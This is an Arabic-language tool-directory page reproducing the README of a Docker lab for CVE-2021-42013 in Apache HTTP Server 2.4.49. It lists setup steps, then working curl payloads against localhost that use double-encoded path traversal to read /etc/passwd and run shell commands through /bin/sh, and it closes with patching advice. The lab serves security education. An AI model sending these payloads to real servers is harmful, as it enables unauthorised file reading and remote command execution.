Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
apache-cve-2021-42013-lab — عمل مخبري لتوضيح ثغرة Apache HTTP Server 2.4.49 (CVE-2021-42013) في بيئة Docker. | Kitploit
أدوات/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

عمل مخبري لتوضيح ثغرة Apache HTTP Server 2.4.49 (CVE-2021-42013) في بيئة Docker.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

اجتياز المسار وتنفيذ الأكواد عن بُعد في Apache HTTP Server 2.4.49 (CVE-2021-42013)

حول المشروع

في هذا المشروع، قمت بتوضيح الثغرة الأمنية CVE-2021-42013 الموجودة في إصدار Apache HTTP Server 2.4.49 داخل بيئة مختبرية أنشأتها باستخدام Docker.

الهدف هو دراسة كيفية نشوء الثغرة، وكيفية عملها، وتأثيراتها على النظام في بيئة خاضعة للتحكم.

أُعدّ هذا العمل لأغراض تعليمية ومخبرية فقط.

التقنيات المستخدمة

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

هيكل ملفات المشروع

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

المتطلبات

قبل تشغيل المشروع، يجب تثبيت ما يلي.

  • Docker Desktop
  • Git (اختياري)

التثبيت

أولاً، قم بتنزيل المستودع (repository) إلى جهازك.

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

ادخل إلى المجلد.

root@kitploit:~
cd apache-cve-2021-42013-lab

أنشئ صورة Docker.

root@kitploit:~
docker build -t apache-2.4.49-src .

شغّل الحاوية (Container).

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

ادخل إلى داخل الحاوية.

root@kitploit:~
docker exec -it apache-src /bin/bash

تحقق من إصدار Apache.

root@kitploit:~
/usr/local/apache2/bin/httpd -v

للخروج من الحاوية:

root@kitploit:~
exit

التحقق من وحدات Apache

يمكنك التحقق مما إذا كانت وحدة CGI مفعّلة باستخدام الأمر التالي.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

تفعيل وحدة CGI

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

ثم أعد تشغيل Apache.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

لتعطيل وحدة CGI:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

ثم أعد تشغيله مرة أخرى.

اختبار الثغرة

اجتياز المسار

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

تنفيذ الأكواد عن بُعد

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

لعرض مزيد من معلومات النظام:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

النتيجة المتوقعة

بعد اكتمال التثبيت:

  • يجب أن يعمل Apache 2.4.49 بنجاح.
  • عند تفعيل وحدة CGI، يمكن ملاحظة الثغرة.
  • يمكن إظهار الوصول إلى ملفات النظام من خلال اجتياز المسار (Path Traversal).
  • يمكن ملاحظة إمكانية تنفيذ الأوامر على الخادم من خلال تنفيذ الأكواد عن بُعد (RCE).

منطق عمل الثغرة

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

لإظهار سيناريو تنفيذ الأكواد عن بُعد (RCE)، يجب تفعيل وحدة mod_cgi.

الوقاية

يُنصح بترقية Apache HTTP Server إلى الإصدار 2.4.51 أو إصدار أحدث لمعالجة هذه الثغرة. كما يُوصى بتعطيل CGI إذا لم يكن مستخدمًا، وتحديد صلاحيات الوصول المناسبة للأدلة الضرورية فقط.

تنزيل الأداة